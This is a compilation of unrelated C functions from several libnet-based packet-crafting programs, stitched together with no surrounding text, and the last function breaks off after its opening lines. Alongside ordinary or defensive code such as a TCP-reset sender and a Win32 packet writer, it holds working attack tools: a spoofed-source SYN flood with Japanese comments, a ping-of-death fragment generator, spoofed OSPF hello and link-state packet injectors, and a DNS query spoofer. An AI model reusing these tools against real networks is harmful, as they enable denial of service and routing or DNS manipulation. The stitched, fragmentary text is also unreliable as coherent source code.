void nids_killtcp_seq(struct tcp_stream *a_tcp, int seqoff)
{
char buf[IP_H + TCP_H];
if (libnetsock == 0)
return;
libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.saddr,
a_tcp->addr.daddr, 0, 0, buf);
libnet_build_tcp(a_tcp->addr.source, a_tcp->addr.dest,
a_tcp->client.first_data_seq +
a_tcp->server.count + a_tcp->server.urg_count +
(seqoff?(a_tcp->server.window/2):0),
0, 0x4, 32000, 0, 0, 0, buf + IP_H);
libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
libnet_write_ip(libnetsock, buf, TCP_H + IP_H);
libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.daddr,
a_tcp->addr.saddr, 0, 0, buf);
libnet_build_tcp(a_tcp->addr.dest, a_tcp->addr.source,
a_tcp->server.first_data_seq +
a_tcp->client.count + a_tcp->client.urg_count +
(seqoff?(a_tcp->client.window/2):0),
0, 0x4, 32000, 0, 0, 0, buf + IP_H);
libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);
libnet_write_ip(libnetsock, buf, TCP_H + IP_H);
}
int
send_tcp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_short
src_prt, u_long dst_ip, u_short dst_prt)
{
int n;
u_char *buf;
if (libnet_init_packet(LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H,
&buf) == -1)
{
perror("no packet memory");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);
libnet_build_ip(LIBNET_TCP_H,
0,
242,
0,
64,
IPPROTO_TCP,
src_ip,
dst_ip,
NULL,
0,
buf + LIBNET_ETH_H);
libnet_build_tcp(src_prt,
dst_prt,
111111,
999999,
TH_SYN,
32767,
0,
NULL,
0,
buf + LIBNET_IP_H + LIBNET_ETH_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H);
n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
+ LIBNET_TCP_H);
if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H)
{
fprintf(stderr, "Oopz. Only wrote %d bytes\n", n);
}
else
{
printf("Wrote %d byte TCP packet through linktype %d\n", n, l->linktype);
}
libnet_destroy_packet(&buf);
return (n);
}
int init(void) {
/* Ethernet header */
etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */
memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */
memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */
/* IP header */
memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address 0.0.0.0
* (pretend to be proxy to
* avoid being elected as master) */
inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst); /* IP destination address */
iphdr.ip_tos = 0; /* IP type of services */
iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */
iphdr.ip_p = IPPROTO_IGMP; /* IP protocol IGMP */
iphdr.ip_off = 0; /* IP fragmentation offset */
iphdr.ip_ttl = 1; /* IP TTL - set to 1 purposely */
/* IGMP header */
igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY; /* IGMP type */
igmphdr.igmp_code = 0; /* IGMP code */
inet_aton(MCAST_MDNS, &igmphdr.igmp_group); /* IGMP group address */
/* Create packet */
linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf);
if (linkint == NULL) {
return -1;
}
igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H;
if (libnet_init_packet(igmp_packetlen, &pkt) == -1) {
return -1;
}
libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost,
ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off,
iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr,
NULL, 0, pkt + LIBNET_ETH_H);
libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code,
igmphdr.igmp_group.s_addr, NULL, 0,
pkt + LIBNET_ETH_H + LIBNET_IP_H);
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H);
}
int
main(int argc, char **argv)
{
int sock, warn, len;
u_char *pack, *to, *from, *neighbor;
u_long src, dst, addaid, addrid, nbr, auth[2];
if (argc != 4)
help(argv[0]);
from = argv[1];
to = argv[2];
neighbor = argv[3];
len = LIBNET_OSPF_H + LIBNET_HELLO_H + LIBNET_IP_H + LIBNET_AUTH_H;
pack = (u_char *)malloc(len);
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("socket");
free(pack);
exit(-1);
}
src = libnet_name_resolve(from, 0);
dst = libnet_name_resolve(to, 0);
nbr = libnet_name_resolve(neighbor, 0);
addrid = 0x23696969;
addaid = 0xc0ffee00; /* GENERIC : FAKE : ETC */
libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_HELLO_H, 0x00,
101, IP_DF, 254, IPPROTO_OSPF, src, dst, NULL, 0, pack);
auth[0] = 0;
auth[1] = 0;
libnet_build_ospf(LIBNET_HELLO_H + LIBNET_AUTH_H, LIBNET_OSPF_HELLO,
addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack +
LIBNET_IP_H);
LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth);
libnet_build_ospf_hello(0xffffffff, 2, 0x00, 0x00, 30, src, src, nbr,
NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H);
libnet_do_checksum(pack, IPPROTO_OSPF, len);
warn = libnet_write_ip(sock, pack, len);
if (warn != len) {
printf("Error sending: %d bytes written : %s\n", warn, strerror(errno));
free(pack);
exit(warn);
} else {
printf("%d bytes written\n", warn);
}
free(pack);
return (0);
}
int
main(int argc, char **argv)
{
int warn, sock, len;
u_char *pack;
char *from, *to, *adrtr;
u_long src, dest, advrouter, addaid, addrid;
u_char auth[2];
if (argc != 4)
help(argv[0]);
from = argv[1];
to = argv[2];
adrtr = argv[3];
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("socket");
exit(-1);
}
src = libnet_name_resolve(from, 0);
dest = libnet_name_resolve(to, 0);
advrouter = libnet_name_resolve(adrtr, 0);
addaid = 0xc0ffeeb0;
addrid = 0xb00f00d0;
len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H;
pack = (u_char *)malloc(len);
libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H, 0x00,
(u_short)rand(), IP_DF, 0xff, IPPROTO_OSPF, src, dest, NULL,
0, pack);
memset(auth, 0, sizeof(auth));
libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSR_H, LIBNET_OSPF_LSR,
addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack +
LIBNET_IP_H);
LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth);
libnet_build_ospf_lsr(LIBNET_LS_TYPE_RTR, 0xffffffff, advrouter, NULL, 0,
pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H);
libnet_do_checksum(pack, IPPROTO_OSPF, len);
warn = libnet_write_ip(sock, pack, len);
if (warn == -1) {
printf("Error writing packet to wire\n");
free(pack);
} else {
printf("%d bytes written\n", warn);
}
free(pack);
return (0);
}
static void
send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip,
struct libnet_tcp_hdr *tcp)
{
int len;
ip->ip_hl = 5;
ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H);
ip->ip_id = libnet_get_prand(LIBNET_PRu16);
memcpy(buf, (u_char *)ip, LIBNET_IPV4_H);
tcp->th_off = 5;
tcp->th_win = htons(MIN_WIN);
memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H);
libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H);
len = LIBNET_IPV4_H + LIBNET_TCP_H;
if (libnet_write_raw_ipv4(l, buf, len) != len)
warn("write");
fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n",
libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport),
libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport),
ntohl(tcp->th_ack), 1);
}
int main (int argc, char **argv)
{
unsigned long fakesrc, target;
unsigned char *buf;
unsigned char *data;
int sock, i, flags, offset, len;
if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1)))
{
fprintf(stderr, "Usage: %s <target>\n", argv[0]);
exit(1);
}
if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
{
perror("raw sock");
exit(1);
}
/* get random src addr. */
libnet_seed_prand();
fakesrc = libnet_get_prand(LIBNET_PRu32);
buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H);
data = (unsigned char *)malloc(FRAG_LEN);
for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN))
{
offset = i;
flags = 0;
if (offset < 65120)
{
flags = IP_MF;
len = FRAG_LEN;
}
else len = 410; /* for total reconstructed len of 65538 */
/* make IP header. */
libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666,
flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target,
NULL, 0, buf);
/* make ICMP packet. */
libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H);
/* calculate ICMP checksum. */
libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len);
/* send it. */
libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len);
/* tcpdump-style jonks. */
printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0),
argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : "");
}
free(buf);
return (EXIT_SUCCESS);
}
void write_icmpether(struct libnet_link_int *iface, char *dev, struct eth_pair *dst,
struct eth_pair *src)
{
unsigned char pkt[ETH_H + IP_H + ICMP_ECHO_H];
libnet_build_ethernet(dst->eth, src->eth, ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(ICMP_ECHO_H, 0, 0, 0, 2, IPPROTO_ICMP, src->ip, dst->ip,
NULL, 0, pkt + ETH_H);
libnet_build_icmp_echo(ICMP_ECHO, 0, 0, 0, NULL, 0, pkt + ETH_H + IP_H);
if(libnet_do_checksum(pkt+ETH_H, IPPROTO_IP, IP_H) == -1)
perror("ipv4 cksum");
if(libnet_do_checksum(pkt+ETH_H, IPPROTO_ICMP, ICMP_ECHO_H) == -1)
perror("ipv4 cksum");
if(libnet_write_link_layer(iface, dev, pkt, sizeof(pkt))
!= sizeof(pkt))
perror("Write link layer");
}
void write_ipether(struct libnet_link_int *iface, char *dev, struct eth_pair *src)
{
unsigned char pkt[ETH_H + IP_H + UDP_H];
struct eth_pair *dst = get_dest();
libnet_build_ethernet(dst->eth, src->eth, ETHERTYPE_IP, NULL, 0, pkt);
libnet_build_ip(UDP_H, 0, 0, 0, 2, IPPROTO_UDP, src->ip, dst->ip,
NULL, 0, pkt + ETH_H);
libnet_build_udp(rand() % (0xffff-1024) + 1024, rand() % 1024,
NULL, 0, pkt + ETH_H + IP_H);
if(libnet_do_checksum(pkt+ETH_H, IPPROTO_IP, IP_H) == -1)
perror("ipv4 cksum");
if(libnet_do_checksum(pkt+ETH_H, IPPROTO_UDP, UDP_H) == -1)
perror("ipv4 cksum");
if(libnet_write_link_layer(iface, dev, pkt, sizeof(pkt))
!= sizeof(pkt))
perror("Write link layer");
}
int
libnet_win32_write_raw_ipv4(libnet_t *l, const uint8_t *payload, uint32_t payload_s)
{
static BYTE dst[ETHER_ADDR_LEN];
static BYTE src[ETHER_ADDR_LEN];
uint8_t *packet = NULL;
uint32_t packet_s;
LPPACKET lpPacket = NULL;
DWORD remoteip = 0;
DWORD BytesTransfered;
NetType type;
struct libnet_ipv4_hdr *ip_hdr = NULL;
memset(dst, 0, sizeof(dst));
memset(src, 0, sizeof(src));
packet_s = payload_s + l->link_offset;
packet = (uint8_t *)malloc(packet_s);
if (packet == NULL)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): failed to allocate packet\n", __func__);
return (-1);
}
/* we have to do the IP checksum */
if (libnet_do_checksum(l, payload, IPPROTO_IP, LIBNET_IPV4_H) == -1)
{
/* error msg set in libnet_do_checksum */
return (-1);
}
/* MACs, IPs and other stuff... */
ip_hdr = (struct libnet_ipv4_hdr *)payload;
memcpy(src, libnet_get_hwaddr(l), sizeof(src));
remoteip = ip_hdr->ip_dst.S_un.S_addr;
/* check if the remote station is the local station */
if (remoteip == libnet_get_ipaddr4(l))
{
memcpy(dst, src, sizeof(dst));
}
else
{
memcpy(dst, libnet_win32_get_remote_mac(l, remoteip), sizeof(dst));
}
PacketGetNetType(l->lpAdapter, &type);
switch(type.LinkType)
{
case NdisMedium802_3:
libnet_win32_build_fake_ethernet(dst, src, ETHERTYPE_IP, payload,
payload_s, packet, l , 0);
break;
case NdisMedium802_5:
libnet_win32_build_fake_token(dst, src, ETHERTYPE_IP, payload,
payload_s, packet, l, 0);
break;
case NdisMediumFddi:
break;
case NdisMediumWan:
case NdisMediumAtm:
case NdisMediumArcnet878_2:
default:
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): network type (%d) is not supported\n", __func__,
type.LinkType);
return (-1);
break;
}
BytesTransfered = -1;
if ((lpPacket = PacketAllocatePacket()) == NULL)
{
snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
"%s(): failed to allocate the LPPACKET structure\n", __func__);
return (-1);
}
PacketInitPacket(lpPacket, packet, packet_s);
/* PacketSendPacket returns a BOOLEAN */
if (PacketSendPacket(l->lpAdapter, lpPacket, TRUE))
{
BytesTransfered = packet_s;
}
PacketFreePacket(lpPacket);
free(packet);
return (BytesTransfered);
}
/*
* Function: static void RejectSocket
*
* Purpose: send a reject packet (tcp-reset or icmp-unreachable
*
* Args: none
*
* Returns: nothing void function
*/
static void
RejectSocket(void)
{
IPHdr *iph;
TCPHdr *tcph;
ICMPHdr *icmph;
int proto;
int size = 0;
int payload_len = 0;
iph = (IPHdr *)l_tcp;
proto = tmpP->iph->ip_proto;
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
switch(proto)
{
case IPPROTO_TCP:
if (!tmpP->frag_flag)
{
size = IP_H + TCP_H;
iph = (IPHdr *)l_tcp;
tcph = (TCPHdr *)(l_tcp + IP_H);
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
tcph->th_sport = tmpP->tcph->th_dport;
tcph->th_dport = tmpP->tcph->th_sport;
tcph->th_seq = tmpP->tcph->th_ack;
tcph->th_ack = htonl(ntohl(tmpP->tcph->th_seq) + 1);
//printf("Send TCP Rst in IP-mode.\n");
/* calculate the checksum */
if (libnet_do_checksum(l_tcp, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendTCPRST: libnet_do_checksum");
return;
}
/* write it to the socket */
if(libnet_write_ip(libnet_nd, l_tcp, size) < size)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendTCPRST: libnet_write_ip");
return;
}
} /* end if !tmpP->frag_flag */
break;
case IPPROTO_UDP:
if (!tmpP->frag_flag)
{
iph = (IPHdr *)l_icmp;
icmph = (ICMPHdr *)(l_icmp + IP_H);
iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr;
iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr;
if ((payload_len = ntohs(tmpP->iph->ip_len) -
(IP_HLEN(tmpP->iph) << 2)) > 8)
{
payload_len = 8;
}
memcpy((char *)icmph + ICMP_UNREACH_H, tmpP->iph,
(IP_HLEN(tmpP->iph) << 2) + payload_len);
size = IP_H + ICMP_UNREACH_H +
(IP_HLEN(tmpP->iph) << 2) + payload_len;
iph->ip_len = htons(size);
/* calculate checksums */
if (libnet_do_checksum(l_icmp, IPPROTO_ICMP, size - IP_H) == -1)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendICMPRST: libnet_do_checksum failed for IPPROTO_ICMP");
return;
}
/* finally write to socket */
if(libnet_write_ip(libnet_nd, l_icmp, size) < size)
{
libnet_error(LIBNET_ERR_CRITICAL,
"SendICMPRST: libnet_write_ip");
return;
}
} /* end if !tmpP->frag_flag */
break;
} /* end switch(proto) */
}
int
main(int argc, char **argv)
{
int sock, warn, len;
u_char *pack;
char *from, *to;
u_long src, dst, addrid, addaid, auth[2];
if (argc != 3)
help(argv[0]);
len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H +
LIBNET_LS_NET_LEN;
pack = (u_char *)malloc(len);
from = argv[1];
to = argv[2];
src = libnet_name_resolve(from, 0);
dst = libnet_name_resolve(to, 0);
addrid = 0xff00ff00;
addaid = 0xd00dd00d;
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror("socket");
free(pack);
exit(sock);
}
libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H +
LIBNET_LS_NET_LEN,
0x00,
(u_short)rand(),
IP_DF,
0xfe,
IPPROTO_OSPF,
src,
dst,
NULL,
0,
pack);
libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN,
LIBNET_OSPF_LSA,
addrid,
addaid,
LIBNET_OSPF_AUTH_NULL,
NULL,
0,
pack + LIBNET_IP_H);
memset(auth, 0, sizeof(auth));
LIBNET_OSPF_AUTHCPY(pack + LIBNET_OSPF_H + LIBNET_IP_H, auth);
libnet_build_ospf_lsa(40,
0x00,
LIBNET_LS_TYPE_NET,
addrid,
src,
0xf0f0f00f,
LIBNET_LS_NET_LEN,
NULL,
0,
pack + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H);
libnet_build_ospf_lsa_net(0xffffff00,
0xc0ffee00,
NULL,
0,
pack + LIBNET_LSA_H + LIBNET_AUTH_H +
LIBNET_OSPF_H + LIBNET_IP_H);
libnet_do_checksum(pack, IPPROTO_OSPF, len);
libnet_do_checksum(pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H,
IPPROTO_OSPF_LSA, LIBNET_LS_NET_LEN + LIBNET_LSA_H);
warn = libnet_write_ip(sock, pack, len);
if (warn == -1) {
printf("Error writing packet to the wire\n");
free(pack);
exit(warn);
}
printf("%d bytes written\n", warn);
free(pack);
return (0);
}
int
send_icmp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_long
dst_ip)
{
int n;
u_char *buf;
if (libnet_init_packet(LIBNET_ICMP_MASK_H + LIBNET_IP_H + LIBNET_ETH_H,
&buf) == -1)
{
perror("no packet memory");
exit(EXIT_FAILURE);
}
/*
* Ethernet header
*/
libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf);
libnet_build_ip(LIBNET_ICMP_MASK_H,
0, /* IP tos */
242, /* IP ID */
0, /* Frag */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload (none) */
0,
buf + LIBNET_ETH_H); /* Packet header memory */
libnet_build_icmp_mask(ICMP_MASKREPLY, /* type */
0, /* code */
242, /* id */
0, /* seq */
0xffffffff, /* mask */
NULL, /* payload */
0, /* payload_s */
buf + LIBNET_ETH_H + LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H);
libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_ICMP, LIBNET_ICMP_MASK_H);
printf("Packet as it will appear on the wire (give or take some byte ordering):");
libnet_hex_dump(buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H, 0,
stdout);
printf("\n");
n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H
+ LIBNET_ICMP_MASK_H);
if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H)
{
fprintf(stderr, "Oopz. Only wrote %d bytes\n", n);
}
else
{
printf("Wrote %d byte ICMP packet through linktype %d\n", n, l->linktype);
}
libnet_destroy_packet(&buf);
return (n);
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 6) {
printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01";
payload_size = 21;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
0, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
33, /* payload length */
packet + LIBNET_IP_H);
/*
* dns header construction
*/
libnet_build_dns(id, /* dns id */
0x0100, /* control flags */
1, /* number of questions */
0, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
/*
* we're done with this packet
*/
libnet_destroy_packet(&packet);
/*
* we're done writing
*/
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd,
FileData *ipod, char *device)
{
int n;
u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0;
static u_int8_t *pkt;
static int sockfd = -1;
struct libnet_link_int *l2 = NULL;
u_int8_t link_offset = 0;
#if !defined(WIN32)
int sockbuff = IP_MAXPACKET;
#endif
if (pd->file_mem == NULL)
pd->file_s = 0;
if (ipod->file_mem == NULL)
ipod->file_s = 0;
if (got_link) /* data link layer transport */
{
if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL)
{
nemesis_device_failure(INJECTION_LINK, (const char *)device);
return -1;
}
link_offset = LIBNET_ETH_H;
}
else
{
if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0)
{
nemesis_device_failure(INJECTION_RAW, (const char *)NULL);
return -1;
}
#if !defined(WIN32)
if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff,
sizeof(sockbuff))) < 0)
{
fprintf(stderr, "ERROR: setsockopt() failed.\n");
return -1;
}
#endif
}
udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s +
ipod->file_s;
udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H);
#ifdef DEBUG
printf("DEBUG: UDP packet length %u.\n", udp_packetlen);
printf("DEBUG: IP options size %u.\n", ipod->file_s);
printf("DEBUG: UDP payload size %u.\n", pd->file_s);
#endif
if (libnet_init_packet(udp_packetlen, &pkt) == -1)
{
fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
return -1;
}
if (got_link)
libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP,
NULL, 0, pkt);
libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off,
ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr,
NULL, 0, pkt + link_offset);
libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem,
pd->file_s, pkt + link_offset + LIBNET_IP_H);
if (got_ipoptions)
{
if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem,
ipod->file_s, pkt + link_offset)) == -1)
{
fprintf(stderr, "ERROR: Unable to add IP options, discarding "
"them.\n");
}
}
if (got_link)
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H +
ipod->file_s);
libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H +
pd->file_s + ipod->file_s);
if (got_link)
n = libnet_write_link_layer(l2, device, pkt, udp_packetlen);
else
n = libnet_write_ip(sockfd, pkt, udp_packetlen);
if (verbose == 2)
nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE);
if (verbose == 3)
nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE);
if (n != udp_packetlen)
{
fprintf(stderr, "ERROR: Incomplete packet injection. Only wrote "
"%d bytes.\n", n);
}
else
{
if (verbose)
{
if (got_link)
printf("Wrote %d byte UDP packet through linktype %s.\n", n,
nemesis_lookup_linktype(l2->linktype));
else
printf("Wrote %d byte UDP packet.\n", n);
}
}
libnet_destroy_packet(&pkt);
if (got_link)
libnet_close_link_interface(l2);
else
libnet_close_raw_sock(sockfd);
return n;
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト
dest_port = (u_short) atoi(argv[2]); // ポート番号
network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // 乱数生成器に種を与える
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // 永久ループ(CTRL-Cで終了されるまで)
{
libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化)
0, // 断片化
libnet_get_prand(LIBNET_PR8), // TTL (乱数化)
IPPROTO_TCP, // トランスポートプロトコル
libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化)
dest_ip, // 宛先IP
NULL, // ペイロード(なし)
0, // ペイロード長
packet); // パケットヘッダメモリ
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化)
dest_port, // 宛先TCPポート
libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化)
libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化)
TH_SYN, // コントロールフラグ (SYNフラグのみ設定)
libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化)
0, // 至急ポインタ
NULL, // ペイロード (なし)
0, // ペイロード長
packet + LIBNET_IP_H); // パケットヘッダメモリ
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する
}
libnet_destroy_packet(&packet); // パケットメモリを解放する
if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
void
tcp_nice_loop(pcap_t *pd, int sock)
{
struct pcap_pkthdr pkthdr;
struct libnet_ip_hdr *ip;
